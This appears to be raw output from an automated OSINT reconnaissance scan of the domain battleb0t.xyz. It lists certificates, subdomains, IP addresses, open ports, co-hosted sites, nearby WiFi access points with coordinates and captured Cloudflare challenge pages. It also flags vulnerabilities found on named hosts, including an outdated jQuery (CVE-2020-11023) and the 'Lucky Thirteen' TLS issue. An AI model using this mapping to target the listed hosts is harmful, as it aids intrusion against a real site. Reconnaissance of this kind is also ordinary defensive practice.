Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
| battleb0t.xyz |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.133 | 34.148.97.127 |
| 2023-05-12 02:47:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.109.153:80 | 185.199.109.153 |
| 2023-05-12 02:53:42 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.0/24 | 185.199.109.153 |
| 2023-05-12 02:45:14 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3031::6815:6a6', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.49): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | aysegul (Net ID: 00:1A:2A:02:80:43) | 40.2024, 29.0398 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5e4de1db49291f-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.87): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.29): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:53 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 37.751, -97.822 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6562 7451 (Net ID: 00:00:C5:D7:2F:EC) | 37.780462,-122.390564 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000hen.github.io | 185.199.111.153 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infoworld (Net ID: 00:02:2D:04:D1:DB) | 37.780462,-122.390564 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Moneysavingexpert (Category: finance)
https://forums.moneysavingexpert.com/profile/login | login |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2086 | 172.67.168.252 |
| 2023-05-12 02:45:34 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | daphne.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 2 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-proxy-cache: MISS | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 010916hao.github.io |
| 2023-05-12 02:49:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN2 (Net ID: 00:02:44:AF:56:1C) | 50.1188, 8.6843 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:80 | 188.114.97.0/24 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Chicago, Illinois, 60666, United States, North America |
| 2023-05-12 03:13:00 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-0-256.github.io]
https://www.openphish.com/feed.txt | 0-0-256.github.io |
| 2023-05-12 02:44:21 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:18 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.109): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:02 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2020-11023
https://nvd.nist.gov/vuln/detail/CVE-2020-11023
Score: 6.1
Description: In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | grasshopper2 (Net ID: 00:01:38:5A:88:28) | 37.7813933,-122.3918002 |
| 2023-05-12 02:59:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nwapi2.battleb0t.xyz |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:52:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation2.4 (Net ID: 00:01:9F:30:06:78) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2083 | 172.67.135.9 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.130): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/kappi_2.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:46:01 | Physical Coordinates | No | AbstractAPI | 93 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 104.196.30.220 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomF390F8 (Net ID: 00:0C:F6:F3:90:F8) | 50.8897, 6.0563 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 18 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 107.48.229.35.bc.googleusercontent.com | 35.229.48.107 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocable (Net ID: 00:04:5A:E4:CE:AD) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="[opaque Cloudflare challenge token omitted]">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 4 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC
1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:59:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
